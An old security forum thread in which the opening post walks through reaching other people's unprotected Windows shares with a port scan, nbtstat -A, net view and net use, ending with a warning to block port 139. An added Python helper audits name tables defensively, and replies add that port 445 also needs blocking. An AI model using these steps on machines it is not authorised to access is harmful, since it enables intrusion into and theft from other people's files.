
Thread: net bios hacking

  1. #1
    Banned
    Join Date
    Sep 2001
    Posts
    852

    net bios hacking

    NetBIOS Tutorial by RiOtEr

    NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.

    1. NetBIOS

    To use NetBIOS remotely the computer has to have it running and unprotected first. To find out if a computer has NetBIOS, boot up your favourite portscanner and look for NetBIOS:

    25/tcp open smtp
    110/tcp open pop-3
    135/tcp open loc-srv
    139/tcp open netBIOS-ssn

    If your results look like that then you're set...

    2. nbtstat

    To get the info you need for the attack we use a program called nbtstat:

    Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.

    Code:
    c:\>nbtstat -A 127.0.0.1

    Use -A if you're using IP addresses. If you're going to use hostnames use -a.

    This will give you what is called a nametable:

    Code:
    Local Area Connection 3:
    Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
    
               NetBIOS Remote Machine Name Table
    
           Name               Type         Status
        ---------------------------------------------
        computername      <00>  UNIQUE      Registered
        workgroupname     <00>  GROUP       Registered
        computername      <20>  UNIQUE      Registered
        workgroupname     <1E>  GROUP       Registered
        workgroupname     <1D>  UNIQUE      Registered
        ..__MSBROWSE__.   <01>  GROUP       Registered
    
        MAC Address = xx-xx-xx-xx-xx-xx
    This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)

    Now, the line
    Code:
    computername      <20>  UNIQUE      Registered

    is the interesting one, as <20> means that file sharing is enabled: that means we can try to connect to that computer.
    First, we need to know their hard drive names etc., and we need to see if it's XP and if they have SharedDocs. To do this we use net view \\ipaddress

    Code:
    C:\>net view \\127.0.0.1
    Shared resources at \\xxx.xxx.xxx.xxx
    Share name  Type  Used as  Comment
    
    -----------------------------------
    SharedDocs  Disk
    The command completed successfully.
    That's the result you should get (it will be different on a non-WinXP box).

    Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
    net use letter: \\ipaddress\name
    Code:
    c:\>net use g: \\127.0.0.1\SharedDocs
    The command completed successfully.
    c:\>net use h: \\127.0.0.1\C
    The command completed successfully.
    Now their hard drive is "mirrored" to the drive letter we specified (so make sure it's not a drive that exists on your computer). Now just browse it as you would a local drive:
    Code:
    c:\>g:
    g:\>
    In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
    When you're done, make sure you remove the shared drive from your machine:
    Code:
    c:\>net use g: /delete
    g: was deleted successfully.
    Some systems may be locked with passwords (win2k, WinNT):
    If you know the password, you would use this command:
    Code:
    net use g: \\ip\sharename password /user:username
    (not sure about that one...)

    Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your Windows machine to be hacked without proper protection... Moral of this story: always cover port 139.

    RiOtEr
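An added example, not part of RiOtEr's post or of nbtstat itself: a small Python audit helper that parses a constructed nbtstat -A name table (same layout as the one quoted above) and reports what the host advertises, so an admin checking their own machines can spot the <20> file server entry before anyone else does. The host name, workgroup, IP and MAC in the sample are made up.

```python
import re

# Constructed sample in the format of the "nbtstat -A <ip>" output shown in the post.
SAMPLE_NAMETABLE = """\
Local Area Connection 3:
Node IpAddress: [192.0.2.10] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WORKSTN01         <00>  UNIQUE      Registered
    WORKGROUP         <00>  GROUP       Registered
    WORKSTN01         <20>  UNIQUE      Registered
    WORKGROUP         <1E>  GROUP       Registered
    WORKGROUP         <1D>  UNIQUE      Registered
    ..__MSBROWSE__.   <01>  GROUP       Registered

    MAC Address = 00-00-5E-00-53-01
"""

# Well-known NetBIOS name suffixes (the 16th byte), keyed by (suffix, name type).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "File server service (file/printer sharing reachable)",
    ("1E", "GROUP"): "Browser service elections",
    ("1D", "UNIQUE"): "Master browser",
    ("01", "GROUP"): "Master browser (__MSBROWSE__)",
}

# One name-table row: name, <suffix>, UNIQUE|GROUP, status.
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")

def parse_nametable(text):
    """Return (name, suffix, type, status) tuples for every row of an nbtstat name table."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            rows.append((name, suffix.upper(), ntype, status))
    return rows

def audit_nametable(text):
    """Explain each advertised name and flag the <20> entry the post calls 'the interesting one'."""
    rows = parse_nametable(text)
    findings = [f"{n} <{s}> {t}: {SUFFIX_MEANING.get((s, t), 'Unknown suffix')}" for n, s, t, _ in rows]
    file_sharing = any(s == "20" and t == "UNIQUE" for _, s, t, _ in rows)
    return {"entries": rows, "findings": findings, "file_sharing_advertised": file_sharing}
```

A host whose table shows no <20> UNIQUE entry is not advertising the file server service, which is what you want to see on anything reachable from outside.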

  2. #2
    Senior Member
    Join Date
    Oct 2001
    Posts
    677
    great post Rioter.
    One Ring to rule them all, One Ring to find them.
    One Ring to bring them all and in the darkness bind them.
    (The Lord Of The Rings)
    http://www.bytekill.net

  3. #3
    Banned
    Join Date
    Mar 2002
    Posts
    520
    Thank yah!

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    734
    fl00t!

  5. #5
    Banned
    Join Date
    Mar 2002
    Posts
    594
    Good post, I learned something!

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    <quote>Moral of this story: always cover port 139.</quote>

    True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

    Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

    Ammo
    Credit travels up, blame travels down -- The Boss

  7. #7
    So when you port scan a system and NetBIOS services are open you can just use net to connect and rummage through their directories?

  8. #8
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Sometimes...

    Depends if there are actually drives shared, and depends on if passwords are set.

    Ammo
    Credit travels up, blame travels down -- The Boss

  9. #9
    Senior Member
    Join Date
    Oct 2001
    Posts
    255
    very good, expect some green, man, best tut I've ever read.

    preep
    http://www.attrition.org/gallery/computing/forum/tn/youarenot.gif.html

  10. #10
    Senior Member
    Join Date
    May 2002
    Posts
    135
    um... you're all probably gonna tell me I have stupid questions but at least I might be safe if it's answered, if you have a firewall doesn't it protect all ports?
